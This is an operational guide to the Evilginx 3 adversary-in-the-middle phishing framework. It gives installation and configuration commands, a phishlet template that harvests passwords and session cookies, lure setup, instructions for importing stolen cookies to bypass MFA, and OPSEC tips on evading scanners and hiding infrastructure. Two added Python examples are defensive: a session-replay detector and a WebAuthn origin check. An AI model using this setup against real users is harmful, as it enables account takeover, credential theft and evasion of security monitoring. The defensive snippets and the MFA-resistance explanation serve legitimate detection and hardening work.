Evilginx 3
Evilginx 3 is an adversary-in-the-middle (AiTM) attack framework that runs as a reverse proxy between the victim and a legitimate website in order to capture credentials, session cookies and authentication tokens in real time, including those protected by multi-factor authentication.
Disclaimer: This tool is intended exclusively for authorized penetration tests, red team operations and security research. Unauthorized use of Evilginx against systems and users without explicit written consent is illegal under computer fraud laws in almost all jurisdictions. Always obtain proper authorization, define the scope and follow responsible disclosure practices.
Installation
# Install Go (required)
wget https://go.dev/dl/go1.22.0.linux-amd64.tar.gz
sudo tar -C /usr/local -xzf go1.22.0.linux-amd64.tar.gz
export PATH=$PATH:/usr/local/go/bin
# Clone and build Evilginx 3
git clone https://github.com/kgretzky/evilginx2.git
cd evilginx2
make
# Or install via Go
go install github.com/kgretzky/evilginx2@latest
# Run (requires root for port 443)
sudo ./evilginx -p ./phishlets
Initial Configuration
DNS Setup
# Before running Evilginx, configure DNS records:
# 1. Register a domain (e.g., example-login.com)
# 2. Point the domain's nameservers to your Evilginx server
# Required DNS records (set at registrar or DNS provider):
# A record: example-login.com -> YOUR_SERVER_IP
# A record: *.example-login.com -> YOUR_SERVER_IP
# Evilginx will auto-provision Let's Encrypt certificates
Server Configuration
# In the Evilginx console:
# Set the server's external IP
config ipv4 external YOUR_SERVER_IP
# Set the phishing domain
config domain example-login.com
# Set the redirect URL (where to send non-phishing traffic)
config redirect_url https://www.wikipedia.org
# View current configuration
config
Phishlets
Listing and Loading Phishlets
# List available phishlets
phishlets
# View details of a specific phishlet
phishlets get-hosts o365
# Enable a phishlet
phishlets enable o365
# Disable a phishlet
phishlets disable o365
# Set hostname for a phishlet
phishlets hostname o365 login.example-login.com
Phishlet Structure
# Example phishlet YAML structure (simplified)
# Located in ./phishlets/example.yaml
name: 'example'
author: 'author'
min_ver: '3.0.0'
proxy_hosts:
  - phish_sub: 'login'
    orig_sub: 'login'
    domain: 'example.com'
    session: true
    is_landing: true
  - phish_sub: 'api'
    orig_sub: 'api'
    domain: 'example.com'
sub_filters:
  - triggers_on: 'login.example.com'
    orig_sub: 'login'
    domain: 'example.com'
    search: 'example.com'
    replace: '{hostname}'
    mimes: ['text/html', 'application/javascript']
auth_tokens:
  - domain: '.example.com'
    keys: ['session_token', 'auth_cookie']
credentials:
  username:
    key: 'email'
    search: '(.*)'
    type: 'post'
  password:
    key: 'password'
    search: '(.*)'
    type: 'post'
login:
  domain: 'login.example.com'
  path: '/authenticate'
Lures
Creating Lures
# Create a lure for a phishlet
lures create o365
# List all lures
lures
# Get the phishing URL for a lure
lures get-url 0
# Set a custom redirect URL after capture
lures edit 0 redirect_url https://legitimate-site.com/dashboard
# Set a custom path for the lure
lures edit 0 path /meeting-invite
# Add URL parameters
lures edit 0 params "ref=email&id=12345"
# Set a pause duration (delay before redirect)
lures edit 0 pause 2
Lure Customization
# Set a custom user-agent filter
lures edit 0 ua_filter "Mozilla"
# Set referrer filter (only allow clicks from specific sources)
lures edit 0 referrer "https://outlook.office.com"
# Re-display the lure URL after customization (the command prints the URL; it does not shorten it)
lures get-url 0
# Delete a lure
lures delete 0
Sessions
Viewing Captured Sessions
# List all captured sessions
sessions
# View details of a specific session
sessions 0
# Session details include:
# - Captured username and password
# - Session cookies/tokens
# - IP address and user agent
# - Timestamp
# - Phishlet used
# Delete a session
sessions delete 0
# Delete all sessions
sessions delete all
Extracting Tokens
# View captured cookies for a session
sessions 0
# Tokens are displayed as JSON, ready to import into browser
# Use browser developer tools or a cookie editor extension to import:
# 1. Open browser DevTools > Application > Cookies
# 2. Or use "EditThisCookie" extension
# 3. Import the captured token values
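The cookie import described above leaves a trace in the target service's own sign-in logs: a session established with MFA from one IP and user agent is then used from a different IP and user agent minutes later. The following is an added detection example, not code from this page or from the Evilginx project; the JSON log lines and their field names are constructed for the illustration.

```python
import json
from datetime import datetime, timedelta

# Constructed sample sign-in/activity log (one JSON object per line); not real data.
# "login" events carry an "mfa" flag; later events reuse the same session id.
SAMPLE_LOG = """
{"ts": "2024-05-01T09:00:00Z", "event": "login", "user": "alice", "session": "s1", "ip": "203.0.113.10", "ua": "Mozilla/5.0 (Windows NT 10.0) Chrome/124", "mfa": true}
{"ts": "2024-05-01T09:01:30Z", "event": "activity", "user": "alice", "session": "s1", "ip": "203.0.113.10", "ua": "Mozilla/5.0 (Windows NT 10.0) Chrome/124"}
{"ts": "2024-05-01T09:07:12Z", "event": "activity", "user": "alice", "session": "s1", "ip": "198.51.100.77", "ua": "Mozilla/5.0 (X11; Linux x86_64) Firefox/125"}
{"ts": "2024-05-01T10:00:00Z", "event": "login", "user": "bob", "session": "s2", "ip": "192.0.2.5", "ua": "Mozilla/5.0 (Macintosh) Safari/17", "mfa": true}
{"ts": "2024-05-01T10:30:00Z", "event": "activity", "user": "bob", "session": "s2", "ip": "192.0.2.5", "ua": "Mozilla/5.0 (Macintosh) Safari/17"}
"""


def parse_log(text: str) -> list:
    """Parse JSON lines into dicts with a datetime timestamp, oldest first."""
    events = []
    for line in text.strip().splitlines():
        e = json.loads(line)
        e["ts"] = datetime.strptime(e["ts"], "%Y-%m-%dT%H:%M:%SZ")
        events.append(e)
    return sorted(events, key=lambda e: e["ts"])


def find_replayed_sessions(events: list, window: timedelta = timedelta(minutes=30)) -> list:
    """Flag sessions whose cookie is reused from a different IP *and* a different
    user agent shortly after an MFA-backed login. Requiring both to change keeps
    mobile IP roaming out of the alert; ASN/geo enrichment would refine this."""
    origin = {}  # session id -> (login time, ip, ua) of the MFA-backed login
    alerts = []
    for e in events:
        sid = e["session"]
        if e["event"] == "login" and e.get("mfa"):
            origin[sid] = (e["ts"], e["ip"], e["ua"])
            continue
        if sid not in origin:
            continue
        t0, ip0, ua0 = origin[sid]
        if e["ip"] != ip0 and e["ua"] != ua0 and e["ts"] - t0 <= window:
            alerts.append({
                "user": e["user"], "session": sid,
                "login_ip": ip0, "replay_ip": e["ip"],
                "minutes_after_mfa": round((e["ts"] - t0).total_seconds() / 60, 1),
            })
    return alerts


if __name__ == "__main__":
    for alert in find_replayed_sessions(parse_log(SAMPLE_LOG)):
        print("possible session replay:", alert)
```

Binding the session to the client that completed MFA (IP/device checks, token binding or continuous access evaluation on the identity provider) turns this alert into a block rather than a notification.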
MFA Bypass Mechanics
How Evilginx bypasses MFA:
1. Victim clicks phishing link
2. Evilginx proxies the real login page to the victim
3. Victim enters credentials -> captured by Evilginx
4. Evilginx forwards credentials to real site
5. Real site prompts for MFA -> proxied to victim
6. Victim completes MFA challenge (push, TOTP, etc.)
7. Real site sets authenticated session cookies
8. Evilginx captures the session cookies
9. Attacker imports session cookies -> authenticated without MFA
What this bypasses:
- SMS/voice OTP
- TOTP authenticator apps
- Push notifications (Authenticator, Duo)
- Email OTP
What this does NOT bypass:
- FIDO2/WebAuthn hardware keys (phishing-resistant)
- Client certificate authentication
- Device-bound passkeys
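Why the "does NOT bypass" entries hold against the nine-step flow above: a WebAuthn assertion is signed over data that names the origin the browser actually talked to, so a relying party rejects an assertion produced on the proxy domain. Below is an added illustration of the relying-party side, not code from this page or from the Evilginx project, reduced to the origin and rpIdHash checks (signature verification against the stored public key is omitted); every domain and challenge value is constructed.

```python
import base64
import hashlib
import json

# Constructed values for the walk-through (not from any real deployment):
RP_ID = "example.com"                             # rpId the legitimate site registered
EXPECTED_ORIGIN = "https://login.example.com"     # origin the RP expects in clientDataJSON
PHISH_ORIGIN = "https://login.example-login.com"  # the proxy domain from the flow above
CHALLENGE = base64.urlsafe_b64encode(b"constructed-challenge").rstrip(b"=").decode()


def build_client_data(origin: str, challenge: str = CHALLENGE) -> bytes:
    # The browser fills in "origin" from the address bar; page script cannot override
    # it, and the authenticator's signature covers SHA-256 of exactly these bytes.
    return json.dumps({"type": "webauthn.get", "challenge": challenge,
                       "origin": origin}).encode()


def build_authenticator_data(rp_id: str) -> bytes:
    # authenticatorData = rpIdHash (32 bytes) || flags (UP set) || signCount (4 bytes)
    return hashlib.sha256(rp_id.encode()).digest() + b"\x01" + (1).to_bytes(4, "big")


def verify_assertion(client_data: bytes, auth_data: bytes,
                     rp_id: str = RP_ID, expected_origin: str = EXPECTED_ORIGIN,
                     challenge: str = CHALLENGE) -> str:
    """Relying-party checks from the WebAuthn assertion ceremony. Returns "ok"
    or the reason for rejection."""
    cd = json.loads(client_data)
    if cd.get("type") != "webauthn.get":
        return "wrong ceremony type"
    if cd.get("challenge") != challenge:
        return "challenge mismatch"
    if cd.get("origin") != expected_origin:
        # A proxied login carries the phishing origin; the proxy cannot rewrite it
        # in transit because the signature over clientDataJSON would no longer verify.
        return "origin mismatch: " + str(cd.get("origin"))
    if auth_data[:32] != hashlib.sha256(rp_id.encode()).digest():
        # The browser derives rpId from the page's own domain; a lookalike hashes differently.
        # (In practice the browser already refuses an rpId that is not a suffix of that domain.)
        return "rpIdHash mismatch"
    return "ok"


if __name__ == "__main__":
    print("legit  :", verify_assertion(build_client_data(EXPECTED_ORIGIN), build_authenticator_data(RP_ID)))
    print("proxied:", verify_assertion(build_client_data(PHISH_ORIGIN), build_authenticator_data(RP_ID)))
    print("bad rp :", verify_assertion(build_client_data(EXPECTED_ORIGIN), build_authenticator_data("example-login.com")))
```

The OTP and push factors listed above carry no such origin binding, which is exactly why the proxy can relay them unchanged.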
Proxy Configuration
# Evilginx acts as a TLS-terminating reverse proxy:
#
# Victim <-> Evilginx (your domain + cert) <-> Real Website
#
# Traffic flow:
# 1. Victim connects to login.example-login.com (your domain)
# 2. Evilginx terminates TLS with Let's Encrypt cert
# 3. Evilginx proxies request to real login.example.com
# 4. Response is modified (domain replacements) and sent to victim
# 5. Victim sees legitimate-looking page on your domain
# Configure TLS certificate behavior
config autocert true
# Blacklist mode (block bots, scanners)
blacklist unauth
# View blacklisted IPs
blacklist
Redirect Rules
# Configure what happens to non-targeted visitors
config redirect_url https://www.wikipedia.org
# Lure-specific redirects (after credential capture)
lures edit 0 redirect_url https://real-site.com/login?error=session_expired
# The redirect URL should look legitimate:
# - Real login page with "session expired" message
# - Password reset confirmation page
# - Generic "meeting has ended" page
# Redirect on invalid path
# Non-lure URLs automatically redirect to config redirect_url
OPSEC and Stealth
# Recommended operational security practices:
# 1. Use a clean VPS with no ties to your identity
# 2. Register domain through privacy-protected registrar
# 3. Age the domain before use (domain reputation)
# 4. Use CloudFlare or similar CDN to hide server IP
# 5. Set strict user-agent filtering on lures
# 6. Monitor and rotate domains after use
# 7. Enable blacklisting of known security scanners
# 8. Set kill dates on phishing campaigns
# 9. Clean up all artifacts after engagement
# Blacklist known security crawlers
blacklist unauth
# Use a custom landing page for non-targeted traffic
config redirect_url https://www.example.com
Logging and Monitoring
# Evilginx logs all activity to the console and log files
# View real-time activity
# (visible in the Evilginx console as events happen)
# Session data is stored in:
# ./data/sessions.json
# Configuration is stored in:
# ./data/config.json
# Monitor for new captures
sessions
# Check periodically or set up alerting
Cleanup
# After an engagement, clean up thoroughly:
# Delete all sessions
sessions delete all
# Delete all lures
lures delete all
# Disable every enabled phishlet (repeat for each one that was enabled)
phishlets disable o365
# Remove the domain configuration
# Decommission the server
# Revoke Let's Encrypt certificates